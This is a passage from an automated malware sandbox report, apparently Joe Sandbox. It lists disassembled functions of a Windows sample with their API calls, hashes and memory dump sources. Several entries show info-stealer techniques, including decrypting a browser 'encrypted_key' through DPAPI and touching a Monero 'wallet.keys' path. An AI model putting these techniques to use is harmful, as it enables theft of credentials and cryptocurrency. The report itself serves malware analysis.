                                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 2100535398-738592651
                                    • Opcode ID: 8afee2f264cf974d92e6fc3d97859519b48a21a8eadd4347d0dd393d186c8235
                                    • Instruction ID: fd449598c08a8b9cb5252796b3ae8acb852d31870bef257c9b41da0fdc896f35
                                    • Opcode Fuzzy Hash: 8afee2f264cf974d92e6fc3d97859519b48a21a8eadd4347d0dd393d186c8235
                                    • Instruction Fuzzy Hash: 503170B6D00608ABCF15DBE4DC45AEEB7B8AB58300F048558E906B7245F7309E04CFA2
                                    Function 00378810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003805BF), ref: 0037885A
                                    • Process32First.KERNEL32(?,00000128), ref: 0037886E
                                    • Process32Next.KERNEL32(?,00000128), ref: 00378883
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                    • CloseHandle.KERNEL32(?), ref: 003788F1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: b4711356b33c1c4081110539456c203caececb885851a9f5af74399d1f0b7ada
                                    • Instruction ID: cedb22627b50763b831c226682c93f6c44eb36cf82ed4811de809dbcd8a54821
                                    • Opcode Fuzzy Hash: b4711356b33c1c4081110539456c203caececb885851a9f5af74399d1f0b7ada
                                    • Instruction Fuzzy Hash: 0F313C71901618ABCB76EB94CC55FEEB7B9EF45700F108199F10EA61A0DB346A44CFA1
                                    Function 003DFDF7 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 003DFE13
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003DFE2C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Value___vcrt_
                                    • String ID:
                                    • API String ID: 1426506684-0
                                    • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                    • Instruction ID: b6fa2aaf71f8ddcce42cfbcf9ef5c654b8c07b49d361b685c0a6a78e288c54fa
                                    • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                    • Instruction Fuzzy Hash: 090171331097B1AEF63626757CC9AAB2798EB017B5735433AF127892F2EFA14C419180
                                    Function 0037CA72 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __getptd.LIBCMT ref: 0037CA7E
                                      • Part of subcall function 0037C2A0: __amsg_exit.LIBCMT ref: 0037C2B0
                                    • __getptd.LIBCMT ref: 0037CA95
                                    • __amsg_exit.LIBCMT ref: 0037CAA3
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0037CAC7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 300741435-0
                                    • Opcode ID: 9b2573d27ea1c2bc733006f2953de5a45b34723615f37d2c6d2b33c8e73494cd
                                    • Instruction ID: 05b6b041ccd3f0276767d35b6e37b5e3fb759a4a19b5957e81b58280c9be8f04
                                    • Opcode Fuzzy Hash: 9b2573d27ea1c2bc733006f2953de5a45b34723615f37d2c6d2b33c8e73494cd
                                    • Instruction Fuzzy Hash: 35F062319647149BDA73FBB8584274E73A0AF40711F11D14EE40C6A1D3DB6C59409B95
                                    Function 003E04D3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Catch
                                    • String ID: MOC$RCC
                                    • API String ID: 78271584-2084237596
                                    • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                    • Instruction ID: 84c7c536eb7beb9386e31745880604b2ae0e197fee3343d93ad6154b98e77357
                                    • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                    • Instruction Fuzzy Hash: 5341AB72900258EFCF1ACF95DC81AEE7BB5FF09304F154259F9046A291D375A990CF50
                                    Function 003E36CB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: T8>
                                    • API String ID: 0-1108016686
                                    • Opcode ID: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
                                    • Instruction ID: b3f9f5446dc949a321ceee699c9eb2300b1d3dc95928143271aa78c55b5d2ac3
                                    • Opcode Fuzzy Hash: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
                                    • Instruction Fuzzy Hash: 94219FF16002B5BFDB12AF638C888AB77ADEF043647154718F9258B6D0D731EE4087A0
                                    Function 00375190 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00378F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00378F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 003751CA
                                    • lstrcat.KERNEL32(?,00381058), ref: 003751E7
                                    • lstrcat.KERNEL32(?,00F38950), ref: 003751FB
                                    • lstrcat.KERNEL32(?,0038105C), ref: 0037520D
                                      • Part of subcall function 00374B60: wsprintfA.USER32 ref: 00374B7C
                                      • Part of subcall function 00374B60: FindFirstFileA.KERNEL32(?,?), ref: 00374B93
                                      • Part of subcall function 00374B60: StrCmpCA.SHLWAPI(?,00380FC4), ref: 00374BC1
                                      • Part of subcall function 00374B60: StrCmpCA.SHLWAPI(?,00380FC8), ref: 00374BD7
                                      • Part of subcall function 00374B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00374DCD
                                      • Part of subcall function 00374B60: FindClose.KERNEL32(000000FF), ref: 00374DE2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                    • String ID:
                                    • API String ID: 2667927680-0
                                    • Opcode ID: f6be588d9e09549dea4fbc35513a10a2cf3b7e749401b54c86a627df87f17799
                                    • Instruction ID: c5dc8fd5703e4a56c585abe65bbe3252148847dec5ad69c2d2aa155a4ee079e0
                                    • Opcode Fuzzy Hash: f6be588d9e09549dea4fbc35513a10a2cf3b7e749401b54c86a627df87f17799
                                    • Instruction Fuzzy Hash: 3821FCB6904208A7CB25FB70EC46EED733D9B94300F008598F65A9A195EE749BCCCBD1